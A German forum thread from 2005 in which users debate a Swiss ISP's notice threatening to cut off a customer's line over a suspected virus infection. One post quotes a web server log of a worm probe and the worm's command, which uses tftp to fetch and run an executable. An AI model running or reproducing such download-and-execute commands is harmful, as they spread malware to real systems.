BlackBoard | Druckvorschau: Provider kappt Leitung aufgrund von Virusverdacht..

Geschrieben von ramius am 12.09.2005 um 14:07:

Provider kappt Leitung aufgrund von Virusverdacht..

Moin zusammen...

Ich habe ein ADSL-Abo beim Schweizer ISP Bluewin, doch vor einigen Tagen bekam ich eine Mail, die mich ziemlich verärgerte:

Zitat:

Liebe Bluewin-Kundin,
Lieber Bluewin-Kunde

Sie haben ein Bluewin-Abonnement auf unserem Server registriert. Swisscom
Fixnet ermöglicht, neben der Benutzung der Bluewin Plattform, das Surfen im
Internet.

Wir weisen in unseren Allgemeinen Geschäftsbedingungen (AGB) und in den
Leistungsbeschreibungen unsere Kunden auf die gesetzlichen und vertraglichen
Regeln hin, welche es im Internet zu respektieren gilt (Strafgesetzbuch,
Leistungsbeschreibung Bluewin, Netiquette).

Wir haben von Bluewin-Kunden, Kunden anderer Anbieter und/oder Internet-
Providern Hinweise erhalten, die auf eine Vireninfektion Ihres Computers
schliessen lässt.

Die Gefahren im Internet nehmen immer grössere Ausmasse an. Gemeinsam mit
Ihnen, geschätzter Kunde, wollen wir alles daran setzen, aktiv gegen Spam und
Viren vorzugehen.

Ist Ihr PC einmal infiziert, so richten Viren und Trojanische Pferde bei Ihnen
und weiteren Benutzern Schaden an, ohne dass Sie dies bemerken. Aufgrund dessen
bitten wir Sie, Ihren Computer umgehend auf Sicherheitsprobleme wie Viren und
Trojanische Pferde zu überprüfen oder sich von einer Fachperson beraten zu
lassen.

Unter folgendem Link erfahren Sie mehr über

- Trojanische Pferde sowie deren Entfernung:
http://de.bluewin.ch/services/sicherheit/index.php/viren_trojaner_de/
- Viren sowie deren Entfernung:
http://de.bluewin.ch/services/sicherheit/index.php/virenschutz_erstehilfe_de/

Sollten Sie im Moment keine Zeit dazu haben, so trennen Sie bitte jetzt Ihren
Computer vom Internet. Schalten Sie dazu entweder das Modem oder den Router aus
oder ziehen Sie den Netzstecker Ihres Modems/Router. Somit findet keine weitere
Verbreitung der Viren über Ihren PC statt. Verbinden Sie Ihren PC erst wieder
mit dem Internet um den PC zu säubern.

Bei Fragen steht Ihnen unser Support gerne zur Verfügung:
http://de.bluewin.ch/kundencenter/index.php/kontakt_index

Falls Sie die geforderten Massnahmen nicht durchführen und uns aufgrund dessen
nach fünf Tagen weitere Hinweise erreichen die Ihren Internetanschluss
betreffen, behalten wir uns die Sperrung desselben bis zum Entfernen des Virus
vor.

Hinweis: Die Verwendung aller Programme, die in diesem Mail erwähnt oder auf
den obigen Internet-Seiten angeboten werden, erfolgt auf eigene Verantwortung.
Bluewin übernimmt keinerlei Haftung für die Funktion dieser Programme oder für
irgendwelche Auswirkungen ihrer Verwendung.

Besten Dank für Ihr Verständnis.

Freundliche Grüsse

Swisscom Fixnet AG
Bluewin Abuse Handling

Die notwendigen Massnahmen zur behebung des Problems sind bereits getroffen, mich würde aber interessieren, ob das überhaupt rechtmässig ist und ob das bei anderen Providern auch üblich ist.

MFG Ramius

Geschrieben von Misel am 12.09.2005 um 15:25:

hmm, ob das rechtmäßig ist, kann ich nicht sagen. Andererseits finde ich es gut, dass ein ISP endlich mal klar Schiff macht und die Verbindung kappt.

User müssen einfach ein höheres Sicherheitsbewusstsein entwickeln.

Geschrieben von PygoscelisPapua am 12.09.2005 um 16:30:

Was mich dabei ein wenig irritiert:

Zitat:

Wir haben von Bluewin-Kunden, Kunden anderer Anbieter und/oder Internet-
Providern Hinweise erhalten, die auf eine Vireninfektion Ihres Computers
schliessen lässt.
[...]
Falls Sie die geforderten Massnahmen nicht durchführen und uns aufgrund dessen nach fünf Tagen weitere Hinweise erreichen die Ihren Internetanschluss
betreffen, behalten wir uns die Sperrung desselben bis zum Entfernen des Virus
vor.

Woher krigen die ihre sogenannten "Hinweise"? Ich find es generell nicht richtig - jeder der einen Rechner hat, ist in erster Linie selbst für diesen verantwortlich und der ISP sollte da imho nix zu melden haben. Die User, die kein Sicherheitsbewusstsein mitbringen, werden früher oder später eh auf den Mund fallen - und dann daraus mehr lernen als jemand, der alle 3 Monate seinen Virenscanner anschmeißt, da er eine neue eMail von seinem ISP bekommen hat...

Und dass ich jemand andern anschwärzen kann find ich ja sowieso ungeheuerlich - aber wenn ich jetzt wieder mit dem Beispiel komm, dass ich dann meinen Nachbarn anschwärze, weil ich mit dem eh immer wieder krach hab, dann kommt gleich wieder was von wegen "Wegen solcher Leute wie Dir...." daher lass ichs

Geschrieben von ramius am 12.09.2005 um 18:08:

hmm...

Zitat:

Woher krigen die ihre sogenannten "Hinweise"?

das nimmt mich eben auch wunder, vor allem desswegen weil es in der Schweiz ein Datenschutzgesetz gibt.

MFG Ramius

Geschrieben von Gh0st am 12.09.2005 um 18:13:

Genau da würde ich ansetzten und ma fragen wo sie denn die Hinweise herbekommen...das kann ja eigentlich gar net sein...eiegntlich ist es dem Provider doch egal wer Viren auf seinem PC hat jeder ist für sich selber verantworlich und es gibt ja sogar gratis Firewalls und Antivirenprog(ein Hoch auf AntiVir)!!
Anschereiben würd ich die schon...naja wenn du lust hast dann poste doch mal deinen Brief/Mail und die Antwort würd mich schon interessieren wie sie das begründen..
MFG Gh0st

Geschrieben von Tehocan am 12.09.2005 um 19:10:

da das per mail kam, würde ich das nicht unbedingt als echt einstufen. der ISP übermittelt ja nur die datenpakete, und darf die an sich gar nicht prüfen oder irgendwelchen ominösen hinweisen nachgehen.

ansonsten:

mit finger auf ramius zeig und laut: "der hat ein virus" ruf!

Geschrieben von PygoscelisPapua am 12.09.2005 um 19:44:

Zitat:

Original von Tehocan
da das per mail kam, würde ich das nicht unbedingt als echt einstufen.

Hab ich mir auch gedacht - aber die Seite ist ja echt, wenn ich das richtig sehe, also hätte da niemand von was, wenn die Mail gefaket wurde - nachvollziehen hätt ichs gekonnt, wenn es sich da um irgend eine phishing-Seite handelt, wo man dann Benutzerkennung und Passwort nochmal eingeben soll, um weiter zu kommen, oder aber wo dann ein Download gestartet werden soll, der verviert ist... aber das ist ja alles nicht der Fall, daher nehm ich schon an, dass die Authenzität der Mail gewärleistet ist.

Absichern könnte man sich in diesem Fall aber durch einen Anruf bei der Supporthotline, oder einer Mail an Bluewin [und nicht als Respond auf die Mail da die Mailadresse vielleicht tatsächlich nicht echt ist]

Geschrieben von LX am 12.09.2005 um 19:46:

Woher die die Daten nehmen? Beispiel: Ein Webseitenbetreiber findet in seinen Serverlogs massenweise "Hackversuche", die auf einen IIS-Wurm hin deuten. Die IP führt via Whois zu Bluewin und wird an abuse@bluewin.de geschickt... zack.

Da ist es doch von Seiten Bluewins das vernünftigste, die Virenschleuder einfach vom Netz zu nehmen, falls der Administrator der Maschine (auch wenn's in diesem Fall ein Endverbraucher ist) die Sache nicht bereinigt.

Das einzige, was mich daran stören würde, ist dass keine konkreten Hinweise genannt wurden, um welche Art von Befall es sich handelt, denn so könnte dem User wie Plüschgo bereits sagte, ein bisschen Sicherheitsbewusstsein Zwangs-eingetrichtert werden

Oder sollen andere im Netz darunter leiden, dass einer sein System net sauber halten kann?

Geschrieben von Black Star am 13.09.2005 um 00:01:

Der Provider selbst kann auch den Traffic analysieren oder Portscans machen, um Trojaner zu finden.

Macht die Uni bei uns auch - die Scannen aktiv die verbundenen Rechner.
Und wer zuoft auffaellt muss halt seinen Rechner saubermachen, und seinen Zugang wieder freischalten lassen.

Geschrieben von CDW am 13.09.2005 um 00:46:

hm, wie versucht das Netz ist, dürfte ich vor kurzem bewundern, als ich mal meinen Webserver zu Testzwecken startete.

Zitat:

84.60.40.52 <-IP des Anfragers
GET / HTTP/1.0
Host: 84.60.128.102 <-meine eigene
Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFB

Was mich allerdings wunderte: die IPs wechselten recht schnell, blieben aber im Arcor-"Bereich":
84.60.170.26
84.60.45.66
84.60.40.56
Peinlicherweise kenne ich jetzt nicht die genaue Bezeichnung dafür (Subnetzberich ? k.A)
ca. 1 "Angriff" pro Minute. Und die IPs waren nach kurzer Zeit nicht mehr erreichbar (kein Ping).Auch lief anscheinend kein Webserver dahinter (zumindest keine Antwort bei telnet IP:80 , was ja nichts heißen muss).Laut google ist es zwar ein Wurm und soll etwa sowas ausführen wollen:

Zitat:

cmd /c tftp -i 0.0.0.0 GET wuamkop.exe&start wuamkop.exe&exit

Aber da müsste doch ein "versender" dahinterstecken. Und so dämlich kann keiner sein, der mehrmals versucht auf den gleichen Server den gleiche Exploit anzuwenden und sich dazu mehrmals einwählt

. Und dass es soviele Webserver in dem "Subadressraum" gibt die auch noch alle "verseucht" sind möchte ich nicht glauben.

Zurück zum Thema: im Prinzip schließe ich mich LX und BlackStar. Man sollte allerdings zumindest den groben Ansatz mitliefern (also die Email etwas ausgefallener generieren lassen

) damit der User auch weiß, was da schief gelaufen ist. Ob es rechtlich Probleme gibt, bezweifele ich - zumindest in Deutschland kann man sich seine Geschäftspartner aussuchen (solange man dabei nicht diskriminierend wird) und auch entsprechende Klausel im Vertrag haben. Ich denke hier ist es so ähnlich wie mit einem Hausverbot.

Zitat:

Ich find es generell nicht richtig - jeder der einen Rechner hat, ist in erster Linie selbst für diesen verantwortlich und der ISP sollte da imho nix zu melden haben

Generell würde ich zustimmen - wenn die betroffenen Rechner nicht die anderen beeinträchtigen würden. Denn entweder verursacht der Wurm/schädling direkt Traffik oder man bekommt den in Form von Spammails über die Bot-Netze bzw. Ddos Attacken. Da dadurch für mancheinen ein großer Schaden entstehen kann (viel Traffik, Webseite nicht erreichbar) obwohl er sein System aktuell hält und sich darum kümmert, sollte man schon solche User zumindest darauf hinweisen.